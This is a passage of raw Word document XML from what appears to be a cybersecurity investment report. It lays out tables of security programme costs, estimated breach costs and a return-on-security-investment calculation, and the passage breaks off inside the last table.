      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="16E15578"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18661CB1"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MFA       Implementation</w:t>
            </w:r>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3A818BEA"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£20,000–£35,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="74AD337D"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5D989EAE"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Zero </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Trust  Segmentation</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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4C0B9DAF"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£40,000–£60,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="106718AC"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339D3859"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SIEM &amp; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log  Integration</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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36F5D7DD"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£30,000–£45,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="5BAB0D21"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5E2A3ABA"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Pen Testing &amp; Hardening</w:t>
            </w:r>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6690CA3A"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~£40,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="47FB3897"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4C2380B5"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Training &amp;    Operational Support</w:t>
            </w:r>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63D39B57"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£20,000–£30,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="4C79582D" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="94"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2046"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0BB6C67C"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lastRenderedPageBreak/>
              <w:t>Total Annual Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF9F3"/>
            <w:tcMar>
              <w:top w:w="20" w:type="dxa"/>
              <w:left w:w="20" w:type="dxa"/>
              <w:bottom w:w="20" w:type="dxa"/>
              <w:right w:w="20" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77E5F873" w14:textId="77777777" w:rsidR="00656352" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:tag w:val="goog_rdk_1"/>
                <w:id w:val="421590934"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidR="00656352" w:rsidRPr="00B40682">
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Gungsuh" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:t>≈ £180,000–£250,000 + £40,000 testing</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66388EB0" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00AF28EE" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C6D5B3"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Cost of Potential Breach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4100ECC0" w14:textId="4D0AD5DE" w:rsidR="00AF28EE" w:rsidRDefault="007D6DE3" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc215851909"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Table 3: Cost of Potential Breach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="4669" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="7" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
          <w:insideH w:val="single" w:sz="7" w:space="0" w:color="000000"/>
          <w:insideV w:val="single" w:sz="7" w:space="0" w:color="000000"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2401"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="44238CDC" w14:textId="2D4B39C3"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002060"/>
            <w:tcMar>
              <w:top w:w="20" w:type="dxa"/>
              <w:left w:w="20" w:type="dxa"/>
              <w:bottom w:w="20" w:type="dxa"/>
              <w:right w:w="20" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05245C40" w14:textId="784CA383" w:rsidR="00656352" w:rsidRPr="00656352" w:rsidRDefault="00656352" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00656352">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Breach </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00656352">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Impact  Area</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="002060"/>
          </w:tcPr>
          <w:p w14:paraId="3ADE81EC" w14:textId="7D0211FB" w:rsidR="00656352" w:rsidRPr="00656352" w:rsidRDefault="00656352" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00656352">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="6A30AB0C" w14:textId="56A24281"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22DF9DF4"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Intellectual Property Theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5DE13E2E" w14:textId="067E57F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£3–£7 million</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="37D8B50E" w14:textId="4D6CF4CD"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681EDDC6"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Operational   Downtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="24F04691" w14:textId="38015248"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£1–£2 million</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="1CCC2AD5" w14:textId="376DF690"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0FA6B01C"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Regulatory &amp; Legal Costs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="32010D0C" w14:textId="25BE6CCC"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£500k–£1.2 million</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="456B8578" w14:textId="51BCFBC0"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5F93E952"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Incident Response &amp; Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="56A54E26" w14:textId="1560A361"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£500k–£1 million</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="57617C2D" w14:textId="220D202E"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48EC1ECA"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Reputation &amp;     Market Loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="78232EBF" w14:textId="37688ED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£1–£2 million</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="41E8654F" w14:textId="2967FBD0" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="630"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2401" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
            <w:tcMar>
              <w:top w:w="20" w:type="dxa"/>
              <w:left w:w="20" w:type="dxa"/>
              <w:bottom w:w="20" w:type="dxa"/>
              <w:right w:w="20" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="51E5BF16" w14:textId="77777777" w:rsidR="00656352" w:rsidRPr="00B40682" w:rsidRDefault="00656352" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="0"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Total </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Estimated  Breach</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="42973474" w14:textId="413C9656" w:rsidR="00656352" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:tag w:val="goog_rdk_2"/>
                <w:id w:val="1898016787"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidR="00656352" w:rsidRPr="00B40682">
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Gungsuh" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:t>≈ £5–£12 million</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DD2A583" w14:textId="77777777" w:rsidR="00656352" w:rsidRPr="00656352" w:rsidRDefault="00656352" w:rsidP="00C60D92">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55172EC7" w14:textId="77777777" w:rsidR="00656352" w:rsidRPr="00B40682" w:rsidRDefault="00656352" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEB36C1" w14:textId="77777777" w:rsidR="00656352" w:rsidRPr="00656352" w:rsidRDefault="00656352" w:rsidP="00C60D92">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14353426" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Return on Security Investment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CC5D97" w14:textId="46C8197C" w:rsidR="007D6DE3" w:rsidRPr="00B40682" w:rsidRDefault="007D6DE3" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc215851910"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Table 4: Return on Security Investment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a2"/>
        <w:tblW w:w="4811" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2011"/>
        <w:gridCol w:w="2800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="50F51104" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="073763"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="581E4B9A"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Investment vs. Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="073763"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1D473CD2"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color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B40682">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="0A88C6C4" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAEBEB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="649AA04A"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Annual Security Investment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAEBEB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1B042EEC"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sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:tag w:val="goog_rdk_3"/>
                <w:id w:val="-1735479683"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="00B40682">
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Gungsuh" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:t>≈ £250,000</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="0C336E71" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAEBEB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3C3DF511"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Estimated Cost of Major Breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAEBEB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2FEF58EE"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£10,000,000+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="799BDB97" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAEBEB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2C209F92"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Net Savings (Avoided Loss)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAEBEB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A96788E"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sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:tag w:val="goog_rdk_4"/>
                <w:id w:val="-1286142656"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="00B40682">
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Gungsuh" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:t>≈ £9,750,000</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w14:paraId="1E242907" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAEBEB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B44215F"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ROSI Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAEBEB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2FC11A8C" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="140" w:right="140"/>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Strong positive ROI (&gt;90% risk-cost reduction)</w:t>
